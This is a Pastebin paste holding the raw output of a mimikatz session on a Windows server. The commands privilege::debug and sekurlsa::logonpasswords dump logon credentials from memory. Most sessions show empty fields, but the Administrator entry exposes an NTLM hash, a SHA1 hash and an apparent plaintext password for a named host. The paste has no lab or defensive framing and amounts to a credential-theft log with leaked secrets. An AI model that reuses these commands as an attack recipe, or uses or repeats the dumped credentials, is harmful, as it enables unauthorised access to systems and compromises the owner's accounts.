Advertisement
Guest User

Untitled

a guest
Jan 11th, 2017
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.88 KB | None | 0 0
  1.  
  2. .#####. mimikatz 2.1 (x64) built on Aug 22 2016 00:57:48
  3. .## ^ ##. "A La Vie, A L'Amour"
  4. ## / \ ## /* * *
  5. ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  6. '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
  7. '#####' with 20 modules * * */
  8.  
  9. mimikatz(commandline) # privilege::debug
  10. Privilege '20' OK
  11.  
  12. mimikatz(commandline) # sekurlsa::logonpasswords
  13.  
  14. Authentication Id : 0 ; 995 (00000000:000003e3)
  15. Session : Service from 0
  16. User Name : IUSR
  17. Domain : NT AUTHORITY
  18. Logon Server : (null)
  19. Logon Time : 2016/12/23 13:58:35
  20. SID : S-1-5-17
  21. msv :
  22. tspkg :
  23. wdigest :
  24. * Username : (null)
  25. * Domain : (null)
  26. * Password : (null)
  27. kerberos :
  28. ssp :
  29. credman :
  30.  
  31. Authentication Id : 0 ; 22955 (00000000:000059ab)
  32. Session : UndefinedLogonType from 0
  33. User Name : (null)
  34. Domain : (null)
  35. Logon Server : (null)
  36. Logon Time : 2016/12/23 13:58:28
  37. SID :
  38. msv :
  39. tspkg :
  40. wdigest :
  41. kerberos :
  42. ssp :
  43. credman :
  44.  
  45. Authentication Id : 0 ; 996 (00000000:000003e4)
  46. Session : Service from 0
  47. User Name : XS1223132628156$
  48. Domain : WORKGROUP
  49. Logon Server : (null)
  50. Logon Time : 2016/12/23 13:58:32
  51. SID : S-1-5-20
  52. msv :
  53. tspkg :
  54. wdigest :
  55. * Username : XS1223132628156$
  56. * Domain : WORKGROUP
  57. * Password : (null)
  58. kerberos :
  59. * Username : xs1223132628156$
  60. * Domain : WORKGROUP
  61. * Password : (null)
  62. ssp :
  63. credman :
  64.  
  65. Authentication Id : 0 ; 997 (00000000:000003e5)
  66. Session : Service from 0
  67. User Name : LOCAL SERVICE
  68. Domain : NT AUTHORITY
  69. Logon Server : (null)
  70. Logon Time : 2016/12/23 13:58:32
  71. SID : S-1-5-19
  72. msv :
  73. tspkg :
  74. wdigest :
  75. * Username : (null)
  76. * Domain : (null)
  77. * Password : (null)
  78. kerberos :
  79. * Username : (null)
  80. * Domain : (null)
  81. * Password : (null)
  82. ssp :
  83. credman :
  84.  
  85. Authentication Id : 0 ; 251438 (00000000:0003d62e)
  86. Session : RemoteInteractive from 2
  87. User Name : Administrator
  88. Domain : XS1223132628156
  89. Logon Server : XS1223132628156
  90. Logon Time : 2016/12/23 14:00:18
  91. SID : S-1-5-21-3928998137-4288194100-1088784815-500
  92. msv :
  93. [00010000] CredentialKeys
  94. * NTLM : 3fed74fad97a86532514a8f2db664a6b
  95. * SHA1 : c1bbc214a0294cd97829343a16cbc3dd20b017b3
  96. [00000003] Primary
  97. * Username : Administrator
  98. * Domain : XS1223132628156
  99. * NTLM : 3fed74fad97a86532514a8f2db664a6b
  100. * SHA1 : c1bbc214a0294cd97829343a16cbc3dd20b017b3
  101. tspkg :
  102. wdigest :
  103. * Username : Administrator
  104. * Domain : XS1223132628156
  105. * Password : 9bed746c13
  106. kerberos :
  107. * Username : Administrator
  108. * Domain : XS1223132628156
  109. * Password : (null)
  110. ssp :
  111. credman :
  112.  
  113. Authentication Id : 0 ; 131103 (00000000:0002001f)
  114. Session : Service from 0
  115. User Name : DefaultAppPool
  116. Domain : IIS APPPOOL
  117. Logon Server : (null)
  118. Logon Time : 2016/12/23 13:58:59
  119. SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
  120. msv :
  121. tspkg :
  122. wdigest :
  123. * Username : XS1223132628156$
  124. * Domain : WORKGROUP
  125. * Password : (null)
  126. kerberos :
  127. ssp :
  128. credman :
  129.  
  130. Authentication Id : 0 ; 999 (00000000:000003e7)
  131. Session : UndefinedLogonType from 0
  132. User Name : XS1223132628156$
  133. Domain : WORKGROUP
  134. Logon Server : (null)
  135. Logon Time : 2016/12/23 13:58:28
  136. SID : S-1-5-18
  137. msv :
  138. tspkg :
  139. wdigest :
  140. * Username : XS1223132628156$
  141. * Domain : WORKGROUP
  142. * Password : (null)
  143. kerberos :
  144. * Username : xs1223132628156$
  145. * Domain : WORKGROUP
  146. * Password : (null)
  147. ssp :
  148. credman :
  149.  
  150. mimikatz(commandline) # exit
  151. Bye!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement